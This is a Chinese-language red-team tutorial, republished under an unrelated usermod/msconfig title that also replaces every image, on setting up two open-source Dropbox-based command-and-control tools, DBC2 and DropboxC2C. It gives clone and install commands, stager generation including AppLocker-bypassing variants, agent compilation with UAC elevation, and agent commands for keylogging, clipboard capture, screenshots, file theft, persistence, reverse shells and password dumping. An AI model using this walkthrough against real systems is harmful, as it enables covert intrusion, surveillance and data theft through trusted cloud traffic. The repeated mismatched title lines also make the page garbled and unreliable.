usermod命令详解(运行命令msconfig)

DropBox简介

目前,许多公司使用DropBox作为共享工具和托管数据,因此对DropBox服务器的流量被限制或归类为恶意域是不常见的,由此可以通过滥用DropBox的功能并将其用作命令和控制中转工具来使用。

DropBoxC2

关于DropBox利用可以通过DropBoxC2工具来实现,该工具使用DropBox API在控制端和被控制端之间进行通信,因为它完全在内存中运行并且流量被加密,所以相对而言较为隐蔽,工具体现架构如下所示:

在第一次使用Dropbox之前,我们需要先去官网(http://www.dropboxchina.com )创建一个账号(Al1ex/xxxxxx@163.com/xxxxxxx): 

usermod命令详解(运行命令msconfig)

之后通过邮箱进行激活:

usermod命令详解(运行命令msconfig)

工具安装
git clone https://github.com/Arno0x/DBC2 dbc2cd dbc2pip install -r requirements.txtchmod +x dropboxC2.py

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

工具使用
基本配置

在控制端与被控制端之间的通信需要通过DropBox API来执行,因此我们首先需要创建新的应用程序才能生成API秘钥:

https://www.dropbox.com/developers/apps/create

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

之后生成AccessToken:

usermod命令详解(运行命令msconfig)

之后我们需要在DropBoxC2项目下的config.py文件(defaultAccessToken参数)中输入API密钥,否则用户需要在每次DBC2启动时都需要插入密钥:

usermod命令详解(运行命令msconfig)

当DropBoxC2运行时,用户需要设置一个主密码,它将用于加密代理和控制器之间的所有数据

usermod命令详解(运行命令msconfig)

在使用DropBox之前我们需要设置Modules和Stage:

publishStage dbc2_agent.exe

usermod命令详解(运行命令msconfig)

之后将在DropBox上生成一个文件,该文件将进行XOR加密:

usermod命令详解(运行命令msconfig)

生成载荷

Dropbox C2可以生成从简单的.bat文件到可以绕过AppLocker的msbuild和sct的各种stager,以及从rubber ducky到macro的各种stager,从而在红队交战期间提供多个利用场景的能力,我们可以在终端输入\\”genStager\\”加空格然后两下tab可列出所有的可使用genStager类型:

usermod命令详解(运行命令msconfig)

我们可以通过以下命令可轻松生成Stager:

genStager oneliner default

usermod命令详解(运行命令msconfig)

genStager batch default

usermod命令详解(运行命令msconfig)

从stager在目标主机上执行的时刻开始,将会生成一个Agent ID值并将其与Beacon相关联:

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

同时将在DropBox上生成两个文件,这两个文件将声明代理的状态以及将传递给目标的命令,这些文件的内容是加密的,以保持通信的机密性

usermod命令详解(运行命令msconfig)

然后可以使用代理ID以便与目标交互并执行命令

usermod命令详解(运行命令msconfig)

DropBoxC2还具有传输文件功能,通过交互式shell执行PowerShell命令以及从目标主机获取屏幕截图的功能,它还支持键盘记录功能,可以启动另一个进程,一些命令可以在下面找到:

上载文件
sendFile

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

下载文件
getFile

首先创建一个文件:

usermod命令详解(运行命令msconfig)

之后下载文件,需要注意的是在Windows系统中路径信息的处理需要使用\\”\\\\\\\\\\”而非\\”\\\\\\”:

usermod命令详解(运行命令msconfig)

桌面截屏

screenshot

usermod命令详解(运行命令msconfig)

键盘记录

keylogger start

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

粘贴板记录

clipboardLogger start

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

创建计划任务

persist

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

此外,还可以使用各种PowerShell模块来执行其他任务,例如获取反向shell,转储密码哈希或从内存中检索明文密码等:

usermod命令详解(运行命令msconfig)

DropboxC2C

工具介绍

Dropboxc2c是一个post-exploitation代理,它使用dropbox基础结构进行命令和控制操作。

工具使用
环境搭建

下载工具到本地:

git clone https://github.com/0x09AL/DropboxC2C.git

usermod命令详解(运行命令msconfig)

安装所需要的依赖项:

usermod命令详解(运行命令msconfig)

修改main.py和agent.py中的API Key(DropBox中的Access Key):  https://www.dropbox.com/developers/apps/info/uiozsdgxxxxxxxxxxxnfa8

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

之后在目标Windows(需要Python环境)主机上执行以下命令编译一个agent.exe,需要注意的是需要使用Python2,同时要安装requirements.txt文件中的第三方依赖包(如果下次再编译时需要删除dist、build文件夹以及agent.spec文件):

pip install -r requirements.txtpip install dis3pip install pypiwin32  #笔者在window中运行exe文件时报错,读者可以自我根据环境来安装与编译,建议CMD下运行pyinstaller --onefile --uac-admin agent.py
#建议在目标主机上进行编译,因为笔者这边测试时发现在另一台win主机上编译好的在目标主机上无法正常执行,跨平台较差

usermod命令详解(运行命令msconfig)

usermod命令详解(运行命令msconfig)

之后在攻击主机上运行main.py文件

python main.py

usermod命令详解(运行命令msconfig)

上线操作

之后在目标主机上执行agent.exe文件

usermod命令详解(运行命令msconfig)

之后再攻击主机中可以看到上线:

usermod命令详解(运行命令msconfig)

使用帮助

help

usermod命令详解(运行命令msconfig)

交互模式

interact DESKTOP-H24D0M0-79461740925497

usermod命令详解(运行命令msconfig)

执行命令

其他操作

从help中我们可以看到还有键盘记录、bypassuac、权限维持等功能,这些不再赘述,在使用中结合场景进行使用即可:

相关链接

https://github.com/Arno0x/DBC2

https://github.com/0x09AL/DropboxC2C

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34274.html

Like (0)
七芒星实验室的头像七芒星实验室
Previous 2024年4月19日
Next 2024年4月20日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注